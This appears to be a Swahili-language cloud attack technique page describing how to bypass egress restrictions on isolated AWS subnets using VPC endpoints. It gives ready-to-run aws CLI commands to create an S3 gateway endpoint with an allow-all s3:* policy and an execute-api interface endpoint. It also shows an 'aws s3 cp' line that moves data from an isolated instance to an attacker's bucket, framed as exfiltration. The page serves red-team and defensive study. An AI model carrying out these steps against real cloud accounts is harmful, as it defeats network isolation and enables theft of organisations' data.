AWS – Bypass ya Egress kutoka kwa Subnets Zilizotengwa kupitia VPC Endpoints

Reading time: 4 minutes

Muhtasari

Mbinu hii inatumia VPC Endpoints ili kuunda mifereji ya kuondoa data (exfiltration) kutoka subnets bila Internet Gateways au NAT. Gateway endpoints (mfano, S3) huongeza prefix‑list routes kwenye jedwali la route la subnet; Interface endpoints (mfano, execute-api, secretsmanager, ssm, n.k.) huunda ENIs zinazoweza kufikika zenye private IPs zilizo salama kwa security groups. Kwa ruhusa ndogo za VPC/EC2, mshambuliaji anaweza kuwezesha egress iliyodhibitiwa ambayo haipitii public Internet.

Mahitaji ya awali: VPC iliyopo na subnets binafsi (hakuna IGW/NAT). Utahitaji ruhusa za kuunda VPC endpoints na, kwa Chaguo B, security group ya kuambatisha kwenye ENIs za endpoint.

Chaguo A – S3 Gateway VPC Endpoint

Vigezo

• REGION=us-east-1
• VPC_ID=<target vpc>
• RTB_IDS=<comma-separated route table IDs of private subnets>

1. Unda faili ya sera ya endpoint yenye kuruhusu (hiari). Hifadhi kama allow-put-get-any-s3.json:

{
"Version": "2012-10-17",
"Statement": [ { "Effect": "Allow", "Action": ["s3:*"], "Resource": ["*"] } ]
}

2. Unda S3 Gateway endpoint (inaongeza S3 prefix‑list route kwa route tables zilizochaguliwa):

aws ec2 create-vpc-endpoint \
--vpc-id $VPC_ID \
--service-name com.amazonaws.$REGION.s3 \
--vpc-endpoint-type Gateway \
--route-table-ids $RTB_IDS \
--policy-document file://allow-put-get-any-s3.json   # optional

Ushahidi wa kukamata:

• aws ec2 describe-route-tables --route-table-ids $RTB_IDS inaonyesha njia kwa AWS S3 prefix list (kwa mfano, DestinationPrefixListId=pl-..., GatewayId=vpce-...).
• Kutoka kwenye instance katika subnets hizo (with IAM perms) unaweza exfil via S3 bila Internet:

# On the isolated instance (e.g., via SSM):
echo data > /tmp/x.txt
aws s3 cp /tmp/x.txt s3://<your-bucket>/egress-test/x.txt --region $REGION

Chaguo B – Interface VPC Endpoint kwa API Gateway (execute-api)

Vigezo

• REGION=us-east-1
• VPC_ID=<target vpc>
• SUBNET_IDS=<comma-separated private subnets>
• SG_VPCE=<security group for the endpoint ENIs allowing 443 from target instances>

1. Unda interface endpoint na uambatike SG:

aws ec2 create-vpc-endpoint \
--vpc-id $VPC_ID \
--service-name com.amazonaws.$REGION.execute-api \
--vpc-endpoint-type Interface \
--subnet-ids $SUBNET_IDS \
--security-group-ids $SG_VPCE \
--private-dns-enabled

Ushahidi wa kukusanya:

• aws ec2 describe-vpc-endpoints inaonyesha endpoint katika hali ya available na NetworkInterfaceIds (ENIs katika subnets yako).
• Instances katika subnets hizo zinaweza kufikia Private API Gateway endpoints kupitia VPCE ENIs hizo (hatitaji njia ya Internet).

Athari

• Inavuka udhibiti wa kutoka wa pembezoni kwa kutumia njia za kibinafsi zinazosimamiwa na AWS kuelekea huduma za AWS.
• Inawezesha kuondoa data kutoka subnet zilizotengwa (mfano, kuandika kwa S3; kupiga Private API Gateway; kufikia Secrets Manager/SSM/STS, n.k.) bila IGW/NAT.